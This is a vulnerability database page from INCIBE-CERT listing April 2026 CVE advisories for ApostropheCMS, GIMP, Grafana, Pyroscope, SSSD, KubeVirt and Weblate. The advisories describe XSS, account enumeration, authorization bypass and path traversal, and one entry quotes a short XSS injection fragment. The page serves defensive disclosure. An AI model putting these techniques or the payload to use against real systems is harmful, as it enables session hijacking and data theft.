Instituto Nacional de ciberseguridad. Sección Incibe
Instituto Nacional de Ciberseguridad. Sección INCIBE-CERT

Go to Calendar     Go to Press Room     Go to Newsletters subscription

Search

Vulnerabilities

With the aim of informing, warning and helping professionals with the latest security vulnerabilities in technology systems, we have made a database available for users interested in this information, which is in Spanish and includes all of the latest documented and recognised vulnerabilities.

This repository, with over 75,000 registers, is based on the information from the NVD (National Vulnerability Database) – by virtue of a partnership agreement – through which INCIBE translates the included information into Spanish.

On occasions this list will show vulnerabilities that have still not been translated, as they are added while the INCIBE team is still carrying out the translation process. The CVE  (Common Vulnerabilities and Exposures) Standard for Information Security Vulnerability Names is used with the aim to support the exchange of information between different tools and databases.

All vulnerabilities collected are linked to different information sources, as well as available patches or solutions provided by manufacturers and developers. It is possible to carry out advanced searches, as there is the option to select different criteria to narrow down the results, some examples being vulnerability types, manufacturers and impact levels, among others.

Through RSS feeds or Newsletters we can be informed daily about the latest vulnerabilities added to the repository. Below there is a list, updated daily, where you can discover the latest vulnerabilities.

CVE-2026-35569
Publication date:
15/04/2026
ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain a stored cross-site scripting vulnerability in SEO-related fields (SEO Title and Meta Description), where user-controlled input is rendered without proper output encoding into HTML contexts including tags, attributes, and JSON-LD structured data. An attacker can inject a payload such as ">alert(1) to break out of the intended HTML context and execute arbitrary JavaScript in the browser of any authenticated user who views the affected page. This can be leveraged to perform authenticated API requests, access sensitive data such as usernames, email addresses, and roles via internal APIs, and exfiltrate it to an attacker-controlled server. This issue has been fixed in version 4.29.0.
Severity CVSS v4.0: Pending analysis
Last modification:
15/04/2026

CVE-2026-40915
Publication date:
15/04/2026
A flaw was found in GIMP. A remote attacker could exploit an integer overflow vulnerability in the FITS image loader by providing a specially crafted FITS file. This integer overflow leads to a zero-byte memory allocation, which is then subjected to a heap buffer overflow when processing pixel data. Successful exploitation could result in a denial of service (DoS) or potentially arbitrary code execution.
Severity CVSS v4.0: Pending analysis
Last modification:
15/04/2026

CVE-2026-40916
Publication date:
15/04/2026
A flaw was found in GIMP. A stack buffer overflow vulnerability in the TIM image loader's 4BPP decoding path allows a local user to cause a Denial of Service (DoS). By opening a specially crafted TIM image file, the application crashes due to an unconditional overflow when writing to a variable-length array.
Severity CVSS v4.0: Pending analysis
Last modification:
15/04/2026

CVE-2026-33889
Publication date:
15/04/2026
ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain a stored cross-site scripting vulnerability in the @apostrophecms/color-field module, where color values prefixed with -- bypass TinyColor validation intended for CSS custom properties, and the launder.string() call performs only type coercion without stripping HTML metacharacters. These unsanitized values are then concatenated directly into tags both in per-widget style elements rendered for all visitors and in the global stylesheet rendered for editors, with the output marked as safe HTML. An editor can inject a value which closes the style tag and executes arbitrary JavaScript in the browser of every visitor to any page containing the affected widget. This enables mass session hijacking, cookie theft, and privilege escalation to administrative control if an admin views draft content. This issue has been fixed in version 4.29.0.
Severity CVSS v4.0: Pending analysis
Last modification:
15/04/2026

CVE-2026-33877
Publication date:
15/04/2026
ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain a timing side-channel vulnerability in the password reset endpoint (/api/v1/@apostrophecms/login/reset-request) that allows unauthenticated username and email enumeration. When a user is not found, the handler returns after a fixed 2-second artificial delay, but when a valid user is found, it performs a MongoDB update and SMTP email send with no equivalent delay normalization, producing measurably different response times. The endpoint also accepts both username and email via an $or query, and has no rate limiting as the existing checkLoginAttempts throttle only applies to the login flow. This enables automated enumeration of valid accounts for use in credential stuffing or targeted phishing. Only instances that have explicitly enabled the passwordReset option are affected, as it defaults to false. This issue has been fixed in version 4.29.0.
Severity CVSS v4.0: Pending analysis
Last modification:
15/04/2026

CVE-2026-33888
Publication date:
15/04/2026
ApostropheCMS is an open-source Node.js content management system. Versions 4.28.0 and prior contain an authorization bypass vulnerability in the getRestQuery method of the @apostrophecms/piece-type module, where the method checks whether a MongoDB projection has already been set before applying the admin-configured publicApiProjection. An unauthenticated attacker can supply a project query parameter in the REST API request, which is processed by applyBuildersSafely before the permission check, pre-populating the projection state and causing the publicApiProjection to be skipped entirely. This allows disclosure of any field on publicly queryable documents that the administrator explicitly restricted from the public API, such as internal notes, draft content, or metadata. Exploitation is trivial, requiring only appending query parameters to a public URL with no authentication. This issue has been fixed in version 4.29.0.
Severity CVSS v4.0: Pending analysis
Last modification:
15/04/2026

CVE-2026-21726
Publication date:
15/04/2026
The CVE-2021-36156 fix validates the namespace parameter for path traversal sequences after a single URL decode, by double encoding, an attacker can read files at the Ruler API endpoint /loki/api/v1/rules/{namespace}<br /> <br /> Thanks to Prasanth Sundararajan for reporting this vulnerability.
Severity CVSS v4.0: Pending analysis
Last modification:
15/04/2026

CVE-2026-21727
Publication date:
15/04/2026
---<br /> title: Cross-Tenant Legacy Correlation Disclosure and Deletion<br /> draft: false<br /> hero:<br /> image: /static/img/heros/hero-legal2.svg<br /> content: "# Cross-Tenant Legacy Correlation Disclosure and Deletion"<br /> date: 2026-01-29<br /> product: Grafana<br /> severity: Low<br /> cve: CVE-2026-21727<br /> cvss_score: "3.3"<br /> cvss_vector: "CVSS:3.3/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N"<br /> fixed_versions:<br /> - "&gt;=11.6.11 &gt;=12.0.9 &gt;=12.1.6 &gt;=12.2.4"<br /> ---<br /> A cross-tenant isolation vulnerability was found in Grafana’s Correlations feature affecting legacy correlation records. Due to a backward compatibility condition allowing org_id = 0 records to be returned across organizations, a user with datasource management privileges could read and permanently delete legacy correlation data belonging to another organization. This issue affects correlations created prior to Grafana 10.2 and is fixed in &gt;=11.6.11, &gt;=12.0.9, &gt;=12.1.6, and &gt;=12.2.4.<br /> <br /> Thanks to Gyu-hyeok Lee (g2h) for reporting this vulnerability.
Severity CVSS v4.0: Pending analysis
Last modification:
15/04/2026

CVE-2025-41118
Publication date:
15/04/2026
Pyroscope is an open-source continuous profiling database. The database supports various storage backends, including Tencent Cloud Object Storage (COS).<br /> <br /> If the database is configured to use Tencent COS as the storage backend, an attacker could extract the secret_key configuration value from the Pyroscope API.<br /> <br /> To exploit this vulnerability, an attacker needs direct access to the Pyroscope API. We highly recommend limiting the public internet exposure of all our databases, such that they are only accessible by trusted users or internal systems.<br /> <br /> This vulnerability is fixed in versions:<br /> <br /> 1.15.x: 1.15.2 and above.<br /> 1.16.x: 1.16.1 and above.<br /> 1.17.x: 1.17.0 and above (i.e. all versions).<br /> <br /> Thanks to Théo Cusnir for reporting this vulnerability to us via our bug bounty program.
Severity CVSS v4.0: Pending analysis
Last modification:
15/04/2026

CVE-2026-6245
Publication date:
15/04/2026
A flaw was found in the System Security Services Daemon (SSSD). The pam_passkey_child_read_data() function within the PAM passkey responder fails to properly handle raw bytes received from a pipe. Because the data is treated as a NUL-terminated C string without explicit termination, it results in an out-of-bounds read when processed by functions like snprintf(). A local attacker could potentially trigger this vulnerability by initiating a crafted passkey authentication request, causing the SSSD PAM responder to crash, resulting in a local Denial of Service (DoS).
Severity CVSS v4.0: Pending analysis
Last modification:
15/04/2026

CVE-2026-6383
Publication date:
15/04/2026
A flaw was found in KubeVirt&amp;#39;s Role-Based Access Control (RBAC) evaluation logic. The authorization mechanism improperly truncates subresource names, leading to incorrect permission evaluations. This allows authenticated users with specific custom roles to gain unauthorized access to subresources, potentially disclosing sensitive information or performing actions they are not permitted to do. Additionally, legitimate users may be denied access to resources.
Severity CVSS v4.0: Pending analysis
Last modification:
15/04/2026

CVE-2026-40256
Publication date:
15/04/2026
Weblate is a web based localization tool. In versions prior to 5.17, repository-boundary validation relies on string prefix checks on resolved absolute paths. In multiple code paths, the check uses startswith against the repository root path. This is not path-segment aware and can be bypassed when the external path shares the same string prefix as the repository path (for example, repo and repo_outside). This issue has been fixed in version 5.17.
Severity CVSS v4.0: Pending analysis
Last modification:
15/04/2026
Subscribe to Vulnerabilities